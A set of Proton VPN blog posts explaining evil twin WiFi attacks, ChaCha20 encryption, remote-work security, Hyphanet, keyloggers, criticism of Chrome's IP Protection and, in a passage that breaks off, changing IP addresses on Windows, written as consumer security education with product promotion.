This rogue WiFi network is the “evil twin” of a legitimate network, designed to deceive you into connecting to it instead of the real network. 

Once you connect to this fake network, the attacker can intercept the unencrypted data you transmit over it, including sensitive information like your usernames and passwords, credit card numbers, and other personal data.

In this article, we’ll look at how evil twin attacks work and discuss why evil twin hotspots are, in reality, no longer a major threat.

• How an evil twin attack works
• Most connections are now encrypted
• You should still use a VPN on public WiFi
• Final thoughts

How an evil twin attack works

You can break down an evil twin attack into the following steps: 

1. Setup

The attacker sets up a WiFi hotspot with a name (SSID) that closely resembles a legitimate one in the area. For example, it might have a name that resembles that of the coffee shop you’re sitting in or something like “Free Airport WiFi” at an airport.

Learn more about SSIDs and how they can be faked

2. Deception

You unsuspectingly connect to the malicious WiFi network, thinking it’s legitimate.

3. Data Interception

Once you connect, the attacker can eavesdrop on your unencrypted internet activity (including capturing passwords and payment details as you enter them), potentially inject malware, or redirect you to phishing sites.

Most connections are now encrypted 

Until a few years ago, evil twin hotspots run by opportunistic hackers were a serious menace to anyone who used public WiFi networks. 

This was because most online connections (such as the connection between your device and a website) were unencrypted. Data was sent in plaintext, meaning that if you were tricked into connecting to an evil twin hotspot, the hacker running it could see everything you did on most websites you visited. The best defense against such attacks was to use a VPN (which we’ll discuss later). 

The dangers of a largely unencrypted internet went far beyond just those posed by public WiFi hackers, as it allowed pretty much anyone to see everything you did on the internet. To combat this pervasive threat, the non-profit Let’s Encrypt campaign started issuing free HTTPS certificates to anyone who asked for them in 2015. 

Now used by over 300 million websites, Let’s Encrypt quickly became the world’s largest certificate authority (CA) and kickstarted an encryption revolution on the web. As of January 2024, 85.1% of all websites use the HTTPS protocol (that figure rises to almost 100% for websites that deal with sensitive data, such as websites that process payments). 

When a website uses HTTPS, its connection to your browser or mobile app is securely encrypted. This prevents hackers and anyone else (such as your WiFi host, ISP, or government) from accessing your data or knowing what you did on a website. 

Learn how HTTPS keeps your connections safe (if not private)

As long as HTTPS is used, attackers can’t use evil twin hotspots to spy on your browsing, even if you’re connected to their network. All modern browsers clearly warn you when visiting a website not secured by HTTPS. 

There is still some theoretical danger from evil twin attacks if you visit the 15% of websites that don’t use HTTPS, but as these are mainly “trash sites” that are obviously insecure, the danger is minimal. Perhaps even more importantly, the chances of a hacker gaining valuable information through an evil twin attack are so low these days that there’s little reason for them to bother trying.

The same is also true of WiFi sniffing attacks that attempt to intercept unencrypted data sent over public WiFi networks, which used to be the other big danger for anyone using a public hotspot. The result is that using public WiFi is much safer than it used to be, and the chances of your data being stolen by a criminal hacker are now minimal.

You should still use a VPN on public WiFi

HTTPS keeps your connections secure — but not private. It prevents criminals from seeing what you do on a website (including any passwords or payment details you enter), but it doesn’t prevent your Internet Service Provider (ISP) or public WiFi host (the person or business who operates the WiFi hotspot you’re connected to) from seeing which websites and services you connect to. And in this age of ubiquitous surveillance capitalism, where everything we do online is monitored and used to target us with ever more personalized ads, this is valuable information. 

There is a reason many public WiFi networks (many of which are operated by commercial third-party companies) require you to provide a valid email address and agree to an intimidatingly long and impenetrable Terns of Service (ToS) agreement before allowing you to use the “free” WiFi. They are selling your browsing history to advertisers. 

Using a virtual private network (VPN) prevents this. It creates an encrypted tunnel between your device and a VPN server so no one else can see what you do online. This includes WiFi operators and your ISP. 

Learn more about how VPNs work

The VPN provider running the VPN server can see what you do online, but (unlike your ISP or public WiFi host) it’s in the business of protecting your privacy. A good VPN service (such as Proton VPN) keeps no logs of your online activity.

Final thoughts: how do you prevent an evil twin attack?

Thanks to the widespread adoption of HTTPS, you don’t really need to worry about evil twin attacks anymore. If they do still concern you, using a good VPN service will provide you with an extra layer of protection and ensure you can visit even non-HTTPS websites safely. 

More importantly, a VPN will protect your privacy when using public WiFi networks, ensuring the WiFi host can’t log your browsing history and sell it to advertisers.  

The post What is an evil twin attack, and should they worry you? appeared first on Proton VPN Blog.

You could think of ChaCha20 as a specialized, highly secure safe. When you encrypt data with ChaCha20, it’s like putting it inside a safe. This safe (ChaCha20) scrambles the contents (your data) so that it becomes unreadable to anyone who doesn’t have the key. This key is a secret code that only the sender and intended receiver know. If someone else tries to read the data without the key, all they see is gibberish.

Learn more about what encryption is and why it’s important

ChaCha20 performs a very similar function to the older and more established AES encryption cipher, and offers some (fairly minor) security improvements over it.

Learn more about AES encryption

ChaCha20 is often combined with the Poly1305 message authentication code to create the ChaCha20-Poly1305 encryption algorithm, which we explain a bit later in this article.

ChaCha20-Poly1305 and AES-GCM are the only symmetric key encryption ciphers recommended for use with TLS 1.3. While the secure but somewhat aging OpenVPN protocol uses AES to secure data, the new lightweight WireGuard protocol uses ChaCha20-Poly1305. 

• Learn more about OpenVPN
• Learn more about WireGuard

ChaCha20 was developed by American German mathematician, cryptographer, and computer scientist Daniel J. Bernstein in 2008, and is based on an earlier cipher also developed by Bernstein in 2005 — Salsa20. Bernstein also created the Poly1305 universal hash family that ChaCha20 is often combined with, and the Curve25519 elliptic curve used to secure the WireGuard key exchange. 

In 2014, Google deployed support for a TLS cipher suite using ChaCha20-Poly1305 in its Chrome browser, and this is now supported by all major browsers.

Notable features of ChaCha20

ChaCha20 is a symmetric-key algorithm

Like AES, ChaCha20 uses the same key to both encrypt and decrypt data (there may sometimes be a simple transformation between the two keys, but they are always derived from the same key). 

This is in contrast to asymmetric-key algorithms such as RSA, which use separate public and private keys. Also known as public-key cryptography, these allow you to securely share data over a distance by making the public key widely available for others to encrypt data with, but which can only be decrypted using the correct private key.

Asymmetric-key algorithms require a high level of computational power, which makes them relatively slow, and thus most useful for encrypting small amounts of data. RSA, for example, is used to perform the TLS key exchange that occurs when connecting to an HTTPS website.

WireGuard and modern TLS cipher suites use a newer approach to asymmetric-key encryption — elliptic-curve cryptography (ECC) — to secure key-exchanges. While more efficient than traditional algorithms such as RSA, it’s still relatively slow.

Symmetric-key algorithms such as ChaCha20, on the other hand, require much less processing power than asymmetric-key ciphers (often cited as being around 1,000 times faster). This makes them ideal for encrypting large volumes of data. 

Where large amounts of data need to be transmitted over a distance (such as over the internet), the data itself is encrypted using a symmetric-key algorithm, while the key exchange is secured using an asymmetric-key algorithm.

In the case of TLS (and therefore also OpenVPN), the symmetric-key algorithm is usually AES, with the key exchange certified using RSA. For WireGuard, ChaCha20 is used for symmetric-key encryption, and Curve25519 to secure the key exchange. 

ChaCha20 is often combined with Poly1305

Poly1305 is a type of cryptographic algorithm used to ensure the security and integrity of data — that is, to ensure data hasn’t changed during transit — using a secret key shared between a sender and recipient. It helps ensure that your secret messages remain private and unaltered during transmission, providing a way for both parties to trust the authenticity and integrity of their communication.

To use an analogy, Poly1305 is like putting a special seal on your message that only the person you’re communicating with can recognize. If the seal is intact when they receive it, they know the message is safe and from you. If someone tries to tamper with the message, the seal will break, and the receiver will know that something is wrong.

This is why, when used together, ChaCha20-Poly130 is referred to as an authenticated encryption with additional data (AEAD) algorithm. Although the math used is different, the concept is very similar to the Galois/counter (GCM) mode used by AES (which is also an AEAD algorithm). 

ChaCha20 vs. AES

As we’ve seen, ChaCha20 fulfills a very similar purpose to the older and much more prevalent AES (as ChaCha20-Poly1305 does to AES-GCM). So which is better?

Learn more about AES encryption

Security

Legendary cryptographer Bruce Schneier once explained that “cryptography is all about safety margins. If you can break n round of a cipher, you design it with 2n or 3n rounds”. Both AES and ChaCha20 encrypt data using rounds, each consisting of a series of mathematical operations. 

AES-256 uses 14 rounds, while ChaCha20 uses 20 rounds. The number of rounds itself cannot be usefully compared, but in the highly influential paper, Too Much Crypto, its authors set out to “propose numbers of rounds for which we have strong confidence that the algorithm will never be wounded, let alone broken”. Their conclusion recommends that AES-256 only needs 11 rounds (instead of the 14 it uses), while ChaCha20 only needs 8 (instead of the 20 it uses). 

This means ChaCha20 has a higher safety margin than AES-256. However, as the paper’s authors also note about the calculations from which their recommendations arise, “From these surrealist figures, it is obvious that such an attack is only a cryptanalysis exercise and does not have much to do with the real security of AES”. In other words, AES and ChaCha20 are both sufficiently secure mathematically.

But is AES vulnerable in other ways? AES has known vulnerabilities to timing attacks, where the number of combinations required to make a successful brute force attack can be reduced by looking at how long a computer takes to perform an operation (although there are a number of ways to protect against this). 

Thanks to its use of add-rotate-xor operations (a highly complex mathematical procedure that makes it very hard for unauthorized users to understand or modify the information operated on), software implementations of ChaCha20 are much more resistant to such timing attacks. But again, this is all very theoretical. Properly implemented AES and AES-GCM are widely regarded as being unbreakable by any known practical attack. 

Performance

AES performance is often boosted with AES-NI hardware support built into modern processors. However, even with this, ChaCha20 usually offers better performance than AES. 

The biggest gains with ChaCha-Poly1305 are on hardware that doesn’t support AES-NI acceleration, such as some ARM chips.

What is XChaCha20?

A cryptographic nonce is an arbitrary value used only once to make an operation (such as encryption or hashing) unique. eXtended-nonce ChaCa20 (XChaCha20) is a variant of ChaCha20 that uses a 192-bit nonce instead of a 96-bit nonce. This makes picking a random nonce notably safer, as there’s effectively no chance that it could be re-used. 

(“Bits” refers to the size or length of the cryptographic keys. In very simple terms, the higher the bit length, the more secure the key.)

However, there is no officially recognized standard for XChaCha20, and the last attempt to establish one failed in 2020. This has led to a slow uptake of the slightly more secure variant. 

Final thoughts

ChaCha20 is a secure and performant symmetric-key algorithm that is closely comparable to the more established AES (as ChaCha20-Poly1305 is to AEA-GCM).

It offers some advantages over AES, but these are negligible enough that most major industry players see little advantage in changing over from AES. For many, the main benefit of ChaCha20 is that it offers a “backup” algorithm in the highly unlikely event that a major weakness is discovered in AES (or AES-GCM). 

However, the choice of ChaCha20-Poly1305 over AEA-GCM to secure data transmitted using the WireGuard VPN protocol has given new prominence to the algorithm, which may yet have a very bright future. 

The post What is ChaCha20? appeared first on Proton VPN Blog.

In this article, we’ll cover eight steps you can easily take to secure your network — no matter where your employees are working.

1. Offer reliable, secure hardware and software
2. Require two-factor authentication
3. Instruct your employees to change their home router password
4. Select the right VPN
5. Ensure VPN use
6. Limit access to internal servers
7. Encrypt group calls
8. Protect employee text messaging

We’ve also included an employee checklist at the end of this article to help you guide your remote employees in securing their work.

What are the threats?

First, it’s important to understand what you’re securing your workplace from.

In most cases, you’re simply trying to protect your company from the common cybercriminals who target all of us online to steal personal data for financial gain. They may not actually be singling out your business, but their impact can be huge. Internet scams cost businesses and individuals a combined $10.3 billion in 2022 in the US alone — and likely more, as cybercrime is underreported. 

These include all kinds of attacks, ranging from phishing to ransomware. If a hacker steals your data and demands payment, you may decide you have no choice but to pay. Or if your customers’ personal data leaks onto the dark web, you could be subject to huge fines for violating data protection laws.

Secure your remote workforce

There are multiple ways to mitigate the risks. Many of these start with prioritizing security, both at a management level and in your employees’ habits. We address this in the checklist below. But apart from training and awareness, there are also technical safeguards you can put in place. Here are eight you can work toward right now.

1. Offer reliable, secure hardware and software

Businesses are responsible for their employees’ hardware and software, even when the devices are outside office walls. Employees may choose hardware and software that are ill-suited or not secure for their work if left on their own. While your employees are responsible for following security best practices, expecting them to assess software and hardware security is unfair and unlikely to lead to good results.

Have a security expert, ideally your IT support team, advise employees on what hardware they should choose, including laptops, printers, cellphones, external microphones for remote meetings, etc.

Also advise them on what basic software they need. This includes office suite software, internet browsers, and email clients.

2. Require two-factor authentication

Whether your employees work from home or the office, you should require two-factor authentication (2FA) on all workplace accounts and encourage it on personal accounts. This adds an extra authentication layer when logging in, so even if an attacker steals someone’s username and password, they won’t be able to access the account. 

2FA should be enabled for email, VPN, chat apps, cloud storage, CRMs, and anywhere else your employees access your network. Typically you can require 2FA from your administrator settings.

3. Instruct your employees to change their home router password

Personal home routers usually come with a default password printed on the bottom. Many people never take the time to change these passwords, making their routers vulnerable to hacking. Make sure your employees change and save their router password, just like they would manage any passwords in the office (using the password manager that you have provided them).

4. Select the right VPN 

As a company with a remote workforce, you need a high-quality VPN, or virtual private network. A VPN will protect your employees’ privacy and security no matter where they are connecting to the internet. We developed Proton VPN for Business specifically to address the most critical security needs of small- and medium-sized businesses.

Here is what to keep in mind when selecting a VPN:

• High speed — Don’t settle for a VPN that slows your remote workforce down. Proton VPN for Business’s VPN Accelerator technology uses advanced networking techniques to reduce latency, cut down on protocol inefficiencies, and overcome CPU limitations. Plus, all Proton VPN servers have a minimum of 1 Gbps bandwidth, with 10 Gbps servers available if you need them.
  
• Secure VPN protocols — Business VPN servers should not support the PPTP and L2TP/IPSec VPN protocols as they aren’t secure. At Proton VPN for Business, we only use the VPN protocols known to be secure. These protocols are WireGuard, OpenVPN, and IKEv2.
  
• Strongest encryption — Your remote workers’ security is only as strong as their VPN’s encryption. Proton VPN uses the strongest encryption possible: AES-256 or ChaCha20 for network traffic, 4096-bit RSA for exchange keys, and HMAC with SHA384 for message authentication. Additionally, all our cipher suites use perfect forward secrecy, meaning we generate a new encryption key every time your employee connects to the VPN.
  
• Network protection — Proton VPN for Business’s Secure Core servers are in hardened data centers in Switzerland, Iceland, and Sweden, protected with full disk encryption. Proton is also protected by some of the strongest privacy laws in the world since it’s a Switzerland-based company. That’s why we can maintain our strict no-logs policy.
  
• Open source and audited — Only trust a VPN that is transparent and independently audited. Our Proton VPN apps are 100% open source. On top of that, we regularly commission independent, professional audits and publicly publish the full results.

5. Ensure VPN Use

No matter how advanced your VPN is, if your employees struggle to use it or avoid using it, that VPN is not valuable. 

To ensure VPN use, enable the Always-on and kill switch features that your VPN provider should offer. The Always-on feature ensures your employee’s device always connects to the internet through the VPN server. If that secure connection is lost for any reason, the kill switch feature kicks in and stops traffic to keep your employee safe.

Another common reason remote workers avoid working through a VPN is that they get blocked from websites that interpret them as threats. Proton VPN’s alternative routing technology allows your employees to bypass most firewalls and VPN blocking methods so they can go about their work unimpeded.

6. Limit access to internal servers

Even if you’re a small business, not all employees need access to all internal resources and databases. This kind of access can be especially dangerous if workers are remote. Set up your VPN to control access permissions.

As the admin of the VPN, you can assign an employee or group of employees to one or more dedicated VPN server IP addresses (also known as ‘gateways’) based on what you want them to have access to. Through this segmentation system, your company’s internal server(s) will recognize and allow access requests from the VPN servers you have configured for that permission, rejecting all requests from any other VPN or regular internet servers.

Beyond giving you flexible, granular control of access, this adds an additional layer of protection: Even if a bad actor obtains the username and password to an internal server resource, they will not be able to access it because their device will not be using the assigned VPN server.

7. Encrypt group calls

With remote work comes remote meetings. Make sure you are protecting those meetings.

Wire is a group audio and video conference platform that utilizes zero-knowledge encryption similar to the model we use in Proton services. It can host up to 100 users in a meeting at the same time. It is independently audited and open source.

8. Protect employee text messages and emails

Remote employees are more likely to text and email each other than in-office employees are. As a business, you need to protect that remote work product too. 

Signal is considered the most secure messaging app. It end-to-end encrypts one-on-one messages as well as group messages. It works on both Android and Apple phones, as well as Linux and Windows setups.

Proton Mail is our email service and the largest end-to-end encrypted email provider in the world. It offers advanced features like expiring and Password-protected Emails, encrypted search, and productivity features like snooze.

Remote employee security checklist

People are usually the weakest link in the security of any system, including your organization’s network. Phishing attacks are designed to take advantage of this fact. To mitigate this, we recommend regular security trainings and reminders.

Below is a security checklist you can share with your employees and modify to suit your workplace as needed.

Use your work device securely

• Keep non-essential applications off your work device and secure it when not in use, even at home.
• Lock your device screens with strong passwords any time you are not using them.
• Report lost or compromised devices immediately to ensure sensitive data is secured.
• Turn off Bluetooth if you’re not actively using it.

Data encryption

• Encrypt the hard drives of your work devices to safeguard sensitive data.
• Activate encryption systems on Android, iOS, macOS, and Windows devices and securely store the recovery codes.

Encrypted communications

• Use Proton Mail for private and secure communication.
• Set expiration dates for sensitive messages to enhance privacy.

Update your software

• Keep all operating systems, programs, and applications up to date. New software versions often contain patches for security vulnerabilities.

Strong passwords

• Use strong, unique passwords (at least 16 characters) for each account.
• Utilize a reputable password manager for password management.

Two-factor authentication

• Enable 2FA on all accounts to add an extra layer of protection.
• Use an authenticator app such as the one built into Proton Pass rather than SMS or other less secure forms.

Secure network access

• Avoid sending sensitive information through unsafe external applications.
• Connect to your work computer through a VPN with secure protocols for added security.

Secure home WiFi network

• Change the default password on your home WiFi router to a strong, unique one.
• Enable encryption, preferably WPA2, on your home WiFi to prevent unauthorized access.

VPN usage

• Connect to your company’s VPN when accessing company resources.

Video conference security

• Ensure no sensitive information is visible during video conferences or screen sharing.
• Password-protect all conference calls to prevent unauthorized access.

Stay alert for social engineering and phishing attacks

• Never click links, download attachments, or scan QR codes from unknown or unexpected senders.
• Refrain from sharing screenshots of video conferences or sensitive information on social media.

The post 8 tips to secure your remote workforce (plus an employee checklist) appeared first on Proton VPN Blog.

Learn more about the different dark webs

• What’s in a name? 
• What is Hyphanet?
• Opennet and darknet
• Is Hyphanet safe?
• How to install Hyphanet
• How to use Hyphanet
• Final thoughts

What’s in a name? 

The original Freenet project dates back to 1999, but recently (March 2023) changed its name to Hyphanet. This is because Ian Clarke, creator of the original Freenet, has started to develop “a successor to Freenet” with “different design priorities”.

This new dark web platform was code-named Locutus, but in mid-2023, the board of Freenet Project, Inc., a non-profit organization that has managed Freenet since 1999, decided to rename the Locutus project to Freenet 2023.

In response, the Freenet community changed the name of the original Freenet to Hyphanet (a reference to underground mycorrhizal fungal networks). 

At the time of writing this article, Freenet 2023 remains firmly at the development stage. An alpha version is available for developers to experiment with, but it isn’t available for general use. This article will therefore focus on Hyphanet.

What is Hyphanet?

Freenet started as a student project by Ian Clarke. This resulted in the widely acclaimed 2001 paper, Freenet: A Distributed Anonymous Information Storage and Retrieval System, which became one of the most frequently cited computer science articles in 2002. 

Unlike other dark web technologies such as Tor and I2P, it’s a pure dark web in that it provides no access to the regular internet. Strictly speaking, it’s a fully distributed, peer-to-peer, anonymous publishing network that offers secure data storage. 

When you join the Hyphanet network, you agree to share a percentage of your local disk space. This space (referred to as a datastore) is securely encrypted, and other Hyphanet members download parts of files from it (similar to BitTorrent). 

However, on top of this basic file-hosting framework, volunteers have developed applications that allow for websites, message boards, and more. A limitation of this system is that websites can’t be dynamic (so they’re always simple static HTML pages). 

An advantage is that web pages (and other data) can be available long after the original host has disappeared. However, if no one accesses data for a long time, it can disappear (this works much like BitTorrent, where files that aren’t actively seeded become de-indexed over time). 

Opennet and darknet

Since 2007, Freenet has offered two “modes” — opennet and darknet. These terms can be somewhat confusing because Freenet’s definitions don’t align with how the public generally understands these terms. 

If you use Hyphanet in opennnet mode, you connect to random peers. As such, openenet mode is similar to Tor Onion Services in many ways. If you use it in darknet mode, you only connect to trusted friends who you’ve previously exchanged public keys and node references with.

It’s these darknets that make Freenet uniquely secure, as it completely blocks outside access to data shared within a darknet group. 

Is Hyphanet safe?

When setting up Hyphanet, you must configure an encrypted datastore on your local disk. This datastore stores fragments of files that other Hyphanet users have uploaded, and you have little or no control over what’s stored there. This prevents Hyphanet users from censoring content by deleting files in their datastore. 

The encryption Hyphanet uses makes it “hard, but not impossible” to determine which files are stored in your local datastore and serves primarily to provide plausible deniability about the nature of the material stored on your local disk. 

Hyphanet was designed to protect the anonymity of those who “insert” (upload) content into the network and “request” (download) it. As with Tor and I2P, you always connect to data stored on Hyphanet indirectly, with your connection first routed through several other nodes in the Hyphanet network. 

Hyphanet bundles packets together and routes them through a varying number of nodes to confuse timing attacks. 

Can Hyphanet be compromised? 

There are a number of reports of law enforcement agencies successfully tracking down Freenet/Hyphanet users, but none of these contain any technical details and have been disputed.

A 2017 paper titled Statistical Detection of Downloaders in Freenet claims to have developed “a passive technique for detecting Freenet downloaders”. But again, this claim is disputed. 

How to install Hyphanet

Hyphanet is available as a Windows .exe, Debian .deb, and Gentoo package. You can also install it on macOS or any Linux system as a .jar file (which requires installing Java). 

The installation wizard does a good job of guiding you through the  setup and then launches the Hyphanet portal in a tab on your default browser. However, you’re strongly advised to run Hyphanet with your browser in Private or Incognito mode, so it’s a good idea to copy the local Hyphanet URL, restart your browser in Private or Incognito mode, and then paste the URL.

The Hyphanet installer also offers to install desktop and menu icons on your system to make accessing Hyphanet easy. 

How to use Hyphanet

Unlike with I2P, Hyphanet doesn’t require you to manually configure your browser’s proxy settings. And unlike either I2P or Tor, its main screen provides a host of useful links to get you started, including an index of Hyphanet websites, a search engine, extensive documentation, developer blogs, plus various email, messaging, and chat tools. 

As noted, all web pages are static HTML, which prevents trackers and other privacy-invasive scripts from being embedded. These take from a few seconds to around a minute to download (in this reviewer’s experience), which is much faster than I2P pages (again, in this reviewer’s experience). 

Many of the utilities available on Hyphanet require the Web of Trust plugin. This attempts to reduce spam and address the fact that anyone can insert content into the Hyphanet network by providing you a cryptographically provable identity with a score value that other community members can assign positive or negative ratings to.

Final thoughts

With no access to the regular internet, a big problem with Hyphanet in opennet mode is that most content is either pointless (“Hi there!”) or illicit in some way. However, its indexes, such as The Filtered Index featured on Hyphanet’s front page, do provide links to potentially more interesting (and savory) content. 

When compared with other dark webs, Hyphanet will always be a niche alternative to Tor Onion Services. However, it is faster than I2P, and a much greater proportion of its links actually work. 

Of course, what really sets Hyphanet apart from other dark webs is the ability to create closed darknets with like-minded people that are almost impossible to detect. 

Because of their closed nature, it’s impossible to know how many people actually use these darknets or to provide any other kind of objective assessment about them. But that’s rather the point.

The post What is Freenet (now called Hyphanet)? appeared first on Proton VPN Blog.

In this article, we look at what keyloggers are, how to detect them, and how to remove them. 

• Keylogger definition
• Are keyloggers malware?
• How does a keylogger infect your system?
• How to detect a keylogger
• Other ways to protect yourself against keyloggers
• Final thoughts

Keylogger definition

A keylogger is any software or hardware device that records your keystrokes when using a computer. Note that “computer” includes mobile devices, as some keylogger software can record your taps and swipes on a touchscreen. 

Software keyloggers are by far the most common, and software keylogging viruses can replicate and infect other devices. 

Hardware keylogging devices might be installed by a manufacturer or government agencies that intercept hardware deliveries. However, the most common type of hardware keylogger is a USB device inserted between a computer’s USB port and its keyboard’s USB connector or dongle (for wireless keyboards). Currently, no known hardware keyloggers can log input from a target mobile device’s touchscreen.  

Most modern keyloggers send the information they collect over the internet to whoever developed or configured them, but some keyloggers (especially physical ones) may require manual retrieval. 

Are keyloggers malware?

Keyloggers are often a form of malware used by criminal hackers to gain illicit access to passwords, bank account details, credit card details, and other highly sensitive information. (Hackers also use hardware keyloggers — a good example is attaching a physical keylogger to the USB ports of computers at an internet café). 

In addition to simple criminal activity, keylogger malware is used for police surveillance,  state-sponsored cyber warfare, and corporate espionage. 

However, there are (more) legitimate uses for keyloggers:

• “Net nanny” software suites often include keylogging capabilities that allow parents to monitor their kids’ online activity and help keep them safe.
• Companies are increasingly using bossware surveillance software with keylogging capabilities (together with the ability to take screenshots and even webcam photos) to ensure employees don’t slack off. The use of this kind of software has skyrocketed as more and more people work remotely. 

How does a keylogger infect your system?

Malware keyloggers infect systems in the same way that other types of malware do.  

• Keylogger viruses self-replicate and spread from computer to computer across networks.
• Keylogger Trojans appear to be legitimate software (or hide inside legitimate software).
• Rootkits may contain keylogger capabilities and can be difficult to detect, even with good anti-malware software.

Learn more about malware

Attackers often distribute malware keyloggers via drive-by-downloads (scripts executed when you visit a malicious website) or phishing (where you are tricked into installing malicious software or clicking a link to a drive-by-download website). 

Corporate or state-sponsored hackers and the police often perform highly targeted attacks against individuals via personalized spear-phishing tactics that use social engineering to trick the victim into installing a malware keylogger. This type of hacker is also more likely to physically access a device to plant a physical keylogger or infect it with keylogger malware. 

Learn more about phishing and spear phishing

More legitimately, it’s perfectly legal for someone to install a keylogger on hardware they own. This includes devices given to children by their parents and laptops supplied to employees. 

Remote employees who use their own equipment are often required to install bossware keyloggers on their hardware as a condition of their contract. 

How to detect a keylogger

Malware keyloggers are by far the most common type of keylogger, so the most effective general defense against keyloggers is to use good antivirus software. 

If you use a public computer to do anything sensitive (for example, at an internet café), it’s always a good idea to quickly check that no strange devices are plugged into its USB ports. If you think you might be singled out for targeted surveillance, you should periodically give your computer a thorough physical examination. 

Other ways to protect yourself against keyloggers

All the usual precautions for protecting yourself against malware apply keyloggers:

• Use good antivirus software
• Don’t open emails from unknown sources
• Don’t click links you’re unsure about
• Don’t install software from untrusted websites

Using two-factor authentication (2FA) is always a good idea, but be aware that malware keyloggers can often steal the contents of your device’s clipboard. Even if you enter the 2FA code manually using your keyboard, a hacker might be able to see this and use the code to log in to your account while the code is still active. 

Additional precautions you can take include:

Use DNS filtering

DNS filtering blocks connections to blocklisted domains. This can help protect you against downloading malware keyloggers from domains that are known to be malicious. If you already have a keylogger on your system, DNS filtering can prevent it from sending your stolen keystrokes back to the hacker. 

Proton VPN offers a DNS filtering feature that’s available to anyone on a paid plan. In addition to filtering out malware, our NetShield Ad-blocker can block ads and trackers. 

Learn more about NetShield

Use a password manager

By far the most common use of keyloggers is to steal usernames and passwords. A password manager such as Proton Pass can autofill passwords, so there are no keystrokes or touchscreen taps for the keylogger to record. 

Final thoughts

Unless you are a person of particular interest to the police, government agencies, corporate hackers, or otherwise have access to valuable assets that could make you a target for cybercriminals, your primary area of concern should be malware keyloggers that opportunistic criminals randomly distribute.

Your best defenses against picking up such malware are using good anti-malware software and being very careful about phishing, which emails you open, and which links you click. 

The post What is a keylogger? appeared first on Proton VPN Blog.

More and more, Google is using privacy washing, a form of false advertising designed to trick people into thinking their products are private.

Before IP Protection, there was “enhanced ad privacy”, another Chrome feature designed to trap you inside Google’s surveillance network to the exclusion of other companies.

The idea behind IP Protection is much the same. It shields your computer’s IP address from other websites while passing all your web traffic through a server owned by Google. This gives Google a God’s-eye view of every website you visit at all times while using Chrome, whether you are logged in to your Google Account or not. There is zero privacy benefit to IP Protection in its current form, and we strongly recommend people do not enable it.

Other privacy advocates are also raising the alarm. Developers reviewing the codebase have strongly criticized Google. 

“This doesn’t have anything to do with security,” one developer wrote. “This is all about control, harvesting data, and ensuring Google’s position as the advertising leader on the internet.”

Why is Google doing this?

Google’s competitive advantage is its highly targeted advertising, with 80% of its $224 billion in revenue coming from ads. These ads are only valuable so long as Google knows all about your interests from your searches and browsing activity.

As the world’s most popular web browser, Chrome is Google’s window on billions of people, particularly when combined with other data sources, such as Google Search or Google Maps. If you’re logged into your Google Account, for example to access your Gmail, the company can then associate all your searches with your account. The company has ways to track you even if you’re using Incognito Mode.

This is why IP Protection is a sham. In its initial stage of development, Google Chrome is using its own proxy server to generate a temporary IP address to conceal your real IP address from a list of specific websites that Google owns. To enable IP Protection at this stage, you must opt in.

In future stages, Google says it may add a second proxy server operated by another company. The “second hop”, as they call it, would only see the temporary IP address from the first server and the website you plan to visit. This other company is supposedly independent, but Google would presumably choose the provider and define its policies. 

The two-hop system may look like a privacy benefit — except that Google already has numerous other ways to track you. Google sees your search history, Google Analytics, your Chrome history, cookies in its ad network, mobile location, inbox, calendar, and on and on. What’s the point of a second privacy layer when Google can monitor your activity in so many other ways?

IP Protection is about two things: privacy washing and building a moat.

Google wants to convince you its service is private while simultaneously collecting your intimate data and preventing competitors from doing the same. IP Protection walls off your data from the rest of the internet while sealing Google’s surveillance apparatus on your side of the wall.

What can you do instead of IP Protection?

It’s easy to start building a privacy wall with Google on the outside. 

You can protect your browsing activity and accomplish what IP Protection claims to by simply using a privacy-protecting browser and a VPN. One of Google’s objectives for IP Protection might actually be to stop users from using independent VPN services, particularly since the better VPN services have ad and tracker blocking technologies built in (such as NetShield in Proton VPN).

Use a private browser

Google Chrome is terrible for privacy. But there are alternatives that respect your privacy. While Chrome gathers data about what you do online, browsers like Firefox don’t. If you’re someone who cares about privacy improvements in Google, you should just stop using Google.

Use a real VPN

While Google will monitor your browsing activity through IP Protection, a trustworthy VPN will never do that. A VPN creates an encrypted tunnel between your device and the rest of the internet, hiding your browsing data from your local network while shielding your IP address from the websites you visit.

Proton VPN has a strict no-logs policy which has been independently audited. Google can also be compelled to log user activity under US law. But because Proton is based in Switzerland, you are legally protected from logging orders by Swiss law.

In addition to protecting your IP address, Proton VPN also protects you from ads, trackers, and malware thanks to NetShield ad-blocker, which is something else Google won’t ever do.

Most importantly, Proton’s business model is based on providing privacy-first services to customers who pay for subscriptions. So Proton’s financial incentives are to protect people from online surveillance, while Google is incentivized to do the opposite.

You can learn more about Proton VPN’s privacy features here. 

Google doesn’t want you to use a real VPN or switch to truly private services, instead hoping you’ll accept IP Protection, “enhanced ad privacy”, and its other privacy washing features. Don’t take the bait. A better internet is possible if you choose.

Learn more about our mission here.

The post Google Chrome’s IP Protection is privacy washing appeared first on Proton VPN Blog.

We discuss how to change the IP address of your Windows 10 or Windows 11 device. This doesn’t change your IP address on the internet, although we’ll look at that as well. 

• Changing your IP address on Windows
• How to change your external IP address on Windows
• How to hide your external IP on Windows using Proton VPN
• Change your Windows IP address using a VPN router
• How to change your local IP address on Windows
• Why change your local IP address on Windows?
• Local IPv4 vs. IPv6 addresses
• How to change your IP address on Windows 10
• How to change your IP address on Windows 11
• Frequently asked questions

Changing your IP address on Windows

An IP address uniquely identifies every device connected directly to a network. Networks can be large or small. Large networks are known as wide area networks (WANs), the most notable example being the internet. 

Local area networks (LANs) are small networks that connect devices within a limited area, such as a home, office, or school. Devices connected to a local area network usually connect to the internet via a router and modem. 

Learn more about IP addresses

In this article, we look both at how to change your Windows device’s external IP address that websites, P2P peers, and apps see and also how to change its local IP address that other devices on your local area network use to identify it. 

• How to change your external IP address on Windows
• How to change your local IP address on Windows

How to change your external IP address on Windows

Your external IP address is the IP address you use to connect to the internet. It’s the IP address that anyone on the internet sees, including websites, P2P peers, and the backend servers that your apps connect to. Your external IP address is assigned to you by your internet service provider (ISP).

Most Windows devices connect indirectly to the internet via a WiFi or wired Ethernet connection to a router. The router then connects to a modem (these two are often combined into the same device), which connects to the internet.

In this scenario, your Windows PC’s external IP address that anyone on the internet can see is actually your router’sIP address. All devices that connect to the internet via that router will share the same external IP address (unless you somehow hide your IP address).  

There are several ways to hide your Windows device’s IP address when using the internet, including:

• Tor browser
• Proxy servers
• A virtual private network (VPN)

All of these methods route your internet connection to another computer so that you appear to access the internet from that computer’s IP address (in the case of Tor, your connection is routed through a series of “nodes”, so you appear to access the internet from the last “exit node” in the chain). This is known as proxying your connection. 

